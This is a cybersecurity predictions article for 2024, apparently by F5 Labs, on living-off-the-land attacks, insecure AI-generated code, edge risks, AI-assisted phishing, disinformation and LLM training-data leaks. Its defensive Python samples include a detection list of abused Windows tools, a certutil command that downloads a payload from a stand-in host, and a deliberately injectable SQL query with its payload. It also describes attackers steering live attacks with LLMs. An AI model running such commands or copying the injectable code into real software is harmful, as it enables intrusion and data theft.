F5 Labs describes fast-changing cybersecurity dynamics in 2024

David Warburton, Director, F5 Labs

How times have changed! Looking back at our cybersecurity predictions for 2023, there was not a single mention of AI. And yet here we are: it seems almost impossible to read a headline in which AI is not somehow involved.

With input from security operations engineers and threat intelligence analysts across F5, here is our take on what we are likely to see in the coming months.

N-dimensional poverty matrix

The security poverty line is defined as the level of knowledge, authority, and, most of all, budget necessary to implement the bare minimum of security controls. The cost and complexity of current security offerings will force organisations to choose between entire families of controls.

Today it seems that organisations need security orchestration, automation, and response (SOAR); security information and event management (SIEM); vulnerability management tools; and threat intelligence services, as well as programmes for configuration management, incident response, penetration testing, and governance, risk, and compliance.

The key issue here is that many enterprise organisations choose to consume these controls as managed services, such that the expertise is guaranteed but so is the cost. The high cost of entry into each of these niches means that they will increasingly become all-or-nothing propositions, and more organisations will eventually need to choose between them.

In other words, the idea of a simple poverty line no longer captures the trade-off between focused capability in one niche and covering all of the bases. Instead of a poverty line, we will have a poverty matrix composed of n dimensions, where n is the number of niches, and even well-resourced enterprises will struggle to put it all together.

Living-off-the-land attacks

The growing complexity of IT environments, particularly in cloud and hybrid architectures, will make it more challenging to monitor for and detect living-off-the-land (LOTL) attacks. Attackers are increasingly turning to LOTL techniques, which use legitimate management software already present on victim systems to achieve their malicious objectives.

To make things worse, LOTL attacks can be incorporated into supply chain attacks to compromise critical infrastructure and disrupt operations. Unless we improve visibility in our own networks, we can expect to see attackers use our own tools against us with increasing frequency.
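As a rough illustration of the kind of visibility that helps here, the Python sketch below scans a process-creation log for legitimate Windows utilities invoked with flags commonly associated with LOTL activity. The log format, the watched binaries, and the flag list are assumptions made for this example rather than anything prescribed by F5 Labs; real detections would draw on richer telemetry such as EDR or Sysmon events and far more extensive rule sets.

```python
import csv
import io

# Built-in binaries that frequently appear in LOTL activity, plus flags that
# often accompany abuse. Both lists are illustrative, not a complete rule set.
WATCHED_BINARIES = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "rundll32.exe", "powershell.exe"}
SUSPICIOUS_FLAGS = {"-urlcache", "-encodedcommand", "/transfer"}

def flag_lotl_candidates(process_log_csv: str):
    """Return log rows where a legitimate admin tool is used with flags
    commonly seen in living-off-the-land activity."""
    hits = []
    for row in csv.DictReader(io.StringIO(process_log_csv)):
        image = row["image"].lower().rsplit("\\", 1)[-1]
        cmdline = row["command_line"].lower()
        if image in WATCHED_BINARIES and any(flag in cmdline for flag in SUSPICIOUS_FLAGS):
            hits.append(row)
    return hits

if __name__ == "__main__":
    # A tiny, invented process-creation log in CSV form.
    sample = (
        "timestamp,image,command_line\n"
        "2024-01-10T09:12:00,C:\\Windows\\System32\\certutil.exe,"
        "certutil -urlcache -f http://example.com/payload.txt payload.txt\n"
        "2024-01-10T09:13:00,C:\\Windows\\System32\\notepad.exe,notepad report.txt\n"
    )
    for hit in flag_lotl_candidates(sample):
        print(hit["timestamp"], hit["image"])
```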

Speed over security

Code assistants write code so quickly that developers may not have time to review it. Depending on when the LLM was trained, it may not even be aware of the latest vulnerabilities, making it unlikely to produce code that avoids them or that steers clear of importing vulnerable libraries. In the age of generative AI, organisations that prioritise speed over security will inevitably introduce new vulnerabilities.

Many developers, seasoned and newbie alike, increasingly look to generative AI to write code or check for bugs. But without the correct safeguards in place, many foresee LLMs creating a deluge of vulnerable code that is difficult to secure. Whilst open source software (OSS) poses a risk, its benefit lies in its inherent fix-once approach: should a vulnerability be discovered in an OSS library, it can be fixed once and the fix reaches everyone who uses that library. With GenAI code generation, every developer ends up with a unique, bespoke piece of code, so no single fix can propagate.
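To make the point concrete, here is a hypothetical, minimal example of the kind of flaw a hurried, assistant-generated snippet can introduce, alongside the safer alternative. The function names and schema are invented for illustration and do not come from the F5 Labs report.

```python
import sqlite3

def find_user_unsafe(conn: sqlite3.Connection, username: str):
    # The kind of query-building a code assistant may suggest when asked for
    # something quick: user input is concatenated straight into SQL, leaving
    # the function open to SQL injection.
    query = f"SELECT id, email FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()

def find_user_safe(conn: sqlite3.Connection, username: str):
    # A one-line fix: a parameterised query lets the driver handle escaping,
    # so crafted input such as "' OR '1'='1" is treated as data, not SQL.
    query = "SELECT id, email FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()

if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, email TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 'alice@example.com')")
    payload = "' OR '1'='1"
    print(find_user_unsafe(conn, payload))  # injected input returns every row
    print(find_user_safe(conn, payload))    # parameterised query returns nothing
```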

Attacking the Edge

The rise of edge computing will drive a dramatic expansion in attack surface. Physical tampering, management challenges, and software and API vulnerabilities are all risks that are exacerbated in an edge context, and edge compute will emerge as an attack surface in its own right.

It is forecast that 75% of enterprise data will soon be generated and processed outside the traditional confines of the data centre or the cloud. This paradigm redefines organisational boundaries, since workloads at the edge may harbour sensitive information and privileges.

Just as with MFA, attackers will focus on the areas where their time has the biggest impact. If the shift to edge computing is handled as carelessly as cloud computing sometimes has been, expect to see a similar number of high-profile incidents over the coming year.

Generative AI will converse with targets

In April 2023, Bruce Schneier pointed out that the real bottleneck in phishing is not the initial click on the malicious link but the cash-out, which often takes far more interaction with the victim than we might assume.

Organised crime gangs will benefit from no longer needing to employ individuals whose entire job is to translate messages from victims and act as a support centre. Generative AI will be used to translate messages out of languages the attackers do not speak and to reply with authentic-sounding responses, coaching the victim along the social engineering path.

By incorporating publicly available personal information to create incredibly lifelike scams, organised cybercrime groups will take the phishing-as-a-service model we already know and magnify it in both scale and efficiency.

Organised cybercrime groups will also create entirely fake online personas. Generative AI will be used to create fake accounts containing posts and images that are indistinguishable from real human content. All of the attack strategies that fake accounts enable, including fraud, credential stuffing, disinformation, and marketplace manipulation, will see an enormous boost in productivity when matching human realism costs almost no effort.

Generative AI for disinformation

The combination of fake content creation, automated text generation for disinformation, targeted misinformation campaigns, and circumvention of content moderation constitutes a leap forward for malicious influence. We have already observed GenAI-created content being used on a small scale in current conflicts around the world.

Reports indicate that AI-generated images have been spread by state and non-state actors to garner support for their side. At a larger scale, expect to see this used by a range of actors ahead of major world events, which in 2024 include the US Presidential election and the Olympics in Paris.

Concerns such as these led Adobe, Microsoft, the BBC, and others to create the C2PA standard, which cryptographically attests to the origin and editing history of digital media. Time will tell whether this will have any measurable impact with the general public.
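For readers curious about the underlying idea, the sketch below shows signed provenance in its simplest possible form: hash the media, wrap the hash in a small claim about its creator, and sign the claim. This is only a conceptual analogue, not the C2PA manifest format or trust model; it relies on the third-party cryptography package, and every name in it is invented for illustration.

```python
import hashlib
import json
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

def make_claim(media_bytes: bytes, creator: str, private_key: Ed25519PrivateKey):
    # Build a minimal provenance claim: who created the media and its hash.
    claim = {"creator": creator, "sha256": hashlib.sha256(media_bytes).hexdigest()}
    payload = json.dumps(claim, sort_keys=True).encode()
    return claim, private_key.sign(payload)

def verify_claim(media_bytes: bytes, claim: dict, signature: bytes, public_key) -> bool:
    # Check the signature over the claim, then check the media still matches it.
    payload = json.dumps(claim, sort_keys=True).encode()
    public_key.verify(signature, payload)  # raises InvalidSignature if the claim was altered
    return hashlib.sha256(media_bytes).hexdigest() == claim["sha256"]

if __name__ == "__main__":
    key = Ed25519PrivateKey.generate()
    media = b"\x89PNG...image bytes..."
    claim, sig = make_claim(media, "Example Newsroom", key)
    print(verify_claim(media, claim, sig, key.public_key()))         # True
    print(verify_claim(media + b"x", claim, sig, key.public_key()))  # False: media was tampered with
```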

Generative AI will drive hacktivism

Hacktivist activity related to major world events is expected to grow as computing power continues to become more affordable and, crucially, easier to use. Through the use of AI tools and the power of their smartphones and laptops, it is likely that more unsophisticated actors will join the fight in cyberspace as hacktivists.

With world events like the Olympics, elections, and ongoing wars taking place in 2024, hacktivists are likely to use these opportunities to gain notoriety for their groups and sympathy for the causes they support. Attendees, sponsors, and other loosely affiliated organisations are likely to become targets, if not victims, of these geopolitically motivated hacktivists. The targeting is likely to extend beyond individuals to the companies and organisations that support different causes.

Real-time inputs from Generative AI

The ability of generative AI to create digital content, be it a phishing email or a fake profile, has been well understood for some time; its use in attacks to date can therefore be considered largely passive. With their impressive ability to create code, LLMs can, and will, be used to direct the sequence of procedures during live attacks, allowing attackers to react to defences as they encounter them.

By leveraging APIs from open GenAI systems such as ChatGPT, or by building their own LLMs, attackers will be able to incorporate the knowledge and ideas of an AI system during a live attack on a website or network. Should an attack be blocked by security controls, an AI system can evaluate the response and suggest alternative ways to attack.

Leaky large language models

Fresh research has shown disturbingly simple ways in which LLMs can be tricked into revealing their training data, which often includes proprietary and personal data. The rush to create proprietary LLMs will result in many more examples of training data being exposed, if not through novel attacks, then by rushed and misconfigured security controls.

Expect to see spectacular failures of GenAI-driven tools—such as massive leaks of PII, novel techniques to gain unauthorised access, and denial of service attacks. As with cloud breaches, the impact of LLM leaks has the potential to be enormous because of the sheer quantity of data involved.
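One control whose absence this prediction implies is basic scrubbing of training data before it reaches a proprietary model. The snippet below is a deliberately minimal, illustrative sketch of that idea, not a recommendation from the article; the regular expressions cover only the most obvious identifiers, and a real pipeline would need far more thorough redaction and review.

```python
import re

# Illustrative PII patterns only: real pipelines need broader coverage
# (names, addresses, account numbers) and human review of edge cases.
PII_PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "phone": re.compile(r"\+?\d[\d\s().-]{7,}\d"),
}

def scrub(text: str) -> str:
    """Replace matches of each PII pattern with a typed placeholder."""
    for label, pattern in PII_PATTERNS.items():
        text = pattern.sub(f"[REDACTED_{label.upper()}]", text)
    return text

if __name__ == "__main__":
    record = "Contact Jane at jane.doe@example.com or +44 20 7946 0958 about the refund."
    print(scrub(record))
```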

These predictions underscore the need for continuous adaptation and innovation in defending against evolving cyber threats.
